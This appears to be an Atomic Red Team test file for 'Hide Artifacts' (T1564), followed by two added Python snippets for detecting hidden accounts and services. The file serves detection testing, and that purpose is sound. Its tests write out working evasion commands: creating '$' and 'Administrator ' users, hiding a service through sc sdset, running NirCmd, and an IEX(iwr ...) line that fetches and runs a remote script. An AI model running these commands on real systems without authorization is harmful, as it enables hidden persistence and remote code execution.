forked from redcanaryco/atomic-red-team
T1564.yaml
attack_technique: T1564
display_name: "Hide Artifacts"
atomic_tests:
- name: Extract binary files via VBA
  auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a
  description: |
    This module extracts a binary (calc.exe) from inside of another binary.
    In the wild, maldoc authors use this technique to hide binaries inside of files stored
    within the Office document itself. An example of this technique can be seen in sample
    f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
    This sample contains a document inside of itself. Document 1 is the actual maldoc, Document 2
    is the same document without the malicious code. Document 1 copies Document 2 to the file system
    and then "peeks" inside that document and pulls out the oleObject.bin file. Contained inside this
    oleObject.bin file is a payload that is parsed out and executed on the file system.
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft Word must be installed
    prereq_command: |
      try {
        New-Object -COMObject "Word.Application" | Out-Null
        Stop-Process -Name "winword"
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
  executor:
    command: |
      $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
      $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
    cleanup_command: |
      Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
    name: powershell
- name: Create a Hidden User Called "$"
  auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
  description: Creating a user with a username containing "$"
  supported_platforms:
  - windows
  executor:
    name: command_prompt
    elevation_required: true
    command: net user $ ATOMIC123! /add /active:yes
    cleanup_command: net user $ /DELETE 2>&1
- name: Create an "Administrator " user (with a space on the end)
  auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c
  description: Creating a user whose username has a space on the end
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: true
    command: New-LocalUser -Name "Administrator " -NoPassword
    cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
- name: Create and Hide a Service with sc.exe
  auto_generated_guid: 333c7de0-6fbe-42aa-ac2b-c7e40b18246a
  description: |
    The following technique uses sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
    Upon successful execution, sc.exe creates a new service and then changes its security descriptor.
    https://twitter.com/Alh4zr3d/status/1580925761996828672
    https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
  supported_platforms:
  - windows
  input_arguments:
    service_name:
      description: Name of service to create
      type: string
      default: AtomicService
    executable_command:
      description: Command to execute as a service
      type: string
      default: 'C:\Windows\System32\calc.exe'
  executor:
    command: |
      sc.exe create #{service_name} binPath= "#{executable_command}"
      sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
    cleanup_command: |
      sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
      sc.exe delete #{service_name}
    name: command_prompt
    elevation_required: true
- name: Command Execution with NirCmd
  description: |
    NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation by running commands as the SYSTEM account.
    See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
  supported_platforms:
  - windows
  input_arguments:
    nircmd_location:
      description: Location of nircmd executable
      type: Path
      default: PathToAtomicsFolder\..\ExternalPayloads\nircmd.exe
    command_to_execute:
      description: Command for nircmd to execute
      type: Path
      default: win child class "Shell_TrayWnd" hide class "TrayClockWClass"
    cleanup_command_to_execute:
      description: Cleanup command to undo the arbitrary command run by nircmd
      type: Path
      default: win child class "Shell_TrayWnd" show class "TrayClockWClass"
  dependency_executor_name: powershell
  dependencies:
  - description: |
      The Nircmd executable must exist at (#{nircmd_location})
    prereq_command: |
      if (Test-Path #{nircmd_location}) {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      invoke-webrequest "https://www.nirsoft.net/utils/nircmd-x64.zip" -outfile "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip"
      expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip" -destinationpath PathToAtomicsFolder\..\ExternalPayloads\
  executor:
    command: |
      cmd /c #{nircmd_location} #{command_to_execute}
    cleanup_command: |
      cmd /c #{nircmd_location} #{cleanup_command_to_execute} -erroraction silentlycontinue | out-null
    name: powershell
    elevation_required: false
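A defender-side check for the two hidden-user tests above ("$" and "Administrator " with a trailing space), added here as an example and not part of the Atomic Red Team file: it screens the account names in constructed Security event 4720 (user account created) records for whitespace padding, "$"-style names and built-in lookalikes. The sample events, the built-in name list and the function names are assumptions of this example.

```python
import re

# Canonical spellings of accounts present on every Windows install. A created
# name that matches one of these only after trimming/case-folding is a lookalike.
CANONICAL_BUILTINS = {"Administrator", "Guest", "DefaultAccount", "WDAGUtilityAccount"}
_FOLDED_BUILTINS = {n.casefold() for n in CANONICAL_BUILTINS}

# Constructed stand-ins for Security event 4720 (created) / 4726 (deleted).
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "$", "SubjectUserName": "alice"},
    {"EventID": 4720, "TargetUserName": "Administrator ", "SubjectUserName": "alice"},
    {"EventID": 4720, "TargetUserName": "svc-backup", "SubjectUserName": "alice"},
    {"EventID": 4726, "TargetUserName": "$", "SubjectUserName": "alice"},
]

def username_findings(name):
    """Return the reasons a local account name looks crafted to be overlooked."""
    reasons = []
    trimmed = name.strip()
    if trimmed != name:
        reasons.append("padded with leading/trailing whitespace")
    if re.search(r"\s", trimmed):
        reasons.append("contains embedded whitespace")
    if trimmed and trimmed.strip("$") == "":
        reasons.append("name consists only of '$'")
    elif trimmed.endswith("$"):
        # Trailing '$' is the computer-account convention; a local user created
        # with net user / New-LocalUser has no reason to carry it.
        reasons.append("trailing '$' imitates a machine account")
    if name not in CANONICAL_BUILTINS and trimmed.casefold() in _FOLDED_BUILTINS:
        reasons.append("lookalike of a built-in account name")
    return reasons

def screen_account_creations(events):
    """Return [(name, reasons)] for 4720 events whose new account looks crafted."""
    flagged = []
    for ev in events:
        if ev.get("EventID") != 4720:
            continue
        reasons = username_findings(ev["TargetUserName"])
        if reasons:
            flagged.append((ev["TargetUserName"], reasons))
    return flagged
```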
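A decoder for the two service descriptors the sc.exe test above writes, added here as an example and not code from the Atomic Red Team file: it parses the DACL of an SDDL string using the service-object meaning of the rights letters described on the Microsoft page the test links, and reports deny ACEs that strip query rights from Interactive, Service and Administrators, which is what keeps the service out of sc query and Get-Service. The rights table, the watched trustee set and the function names are assumptions of this example; HIDDEN_SDDL and RESTORED_SDDL are copied from the test's command and cleanup_command.

```python
import re

# What each two-letter SDDL right means when the object is a Windows service.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Rights the listing tools need; the test's deny ACEs remove LC from them.
QUERY_RIGHTS = {"SERVICE_QUERY_STATUS", "SERVICE_QUERY_CONFIG"}
# Well-known trustees whose denial hides the service from the usual callers.
WATCHED = {"IU": "Interactive", "SU": "Service", "BA": "Administrators"}

# The descriptor the atomic test applies, and the one its cleanup restores.
HIDDEN_SDDL = ("D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
RESTORED_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                 "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

def parse_dacl(sddl):
    """Return (ace_type, rights, trustee) for each ACE in the D: section."""
    m = re.search(r"D:(.*?)(?=S:|$)", sddl)
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1) if m else ""):
        # ACE layout: type;flags;rights;object_guid;inherit_guid;trustee
        fields = ace.split(";")
        ace_type, rights_str, trustee = fields[0], fields[2], fields[5]
        if rights_str.startswith("0x"):
            rights = {rights_str}  # raw access mask, left undecoded here
        else:
            pairs = [rights_str[i:i + 2] for i in range(0, len(rights_str), 2)]
            rights = {SERVICE_RIGHTS.get(p, p) for p in pairs}
        aces.append((ace_type, rights, trustee))
    return aces

def hidden_service_findings(sddl):
    """List deny ACEs that strip query rights from the watched trustees."""
    findings = []
    for ace_type, rights, trustee in parse_dacl(sddl):
        denied = rights & QUERY_RIGHTS
        if ace_type == "D" and trustee in WATCHED and denied:
            findings.append(f"{WATCHED[trustee]} denied {', '.join(sorted(denied))}")
    return findings
```

Running the same decoder over the descriptors pulled from a live host (sc sdset output, or the Security key under each service in the registry) turns the test's trick into a periodic audit.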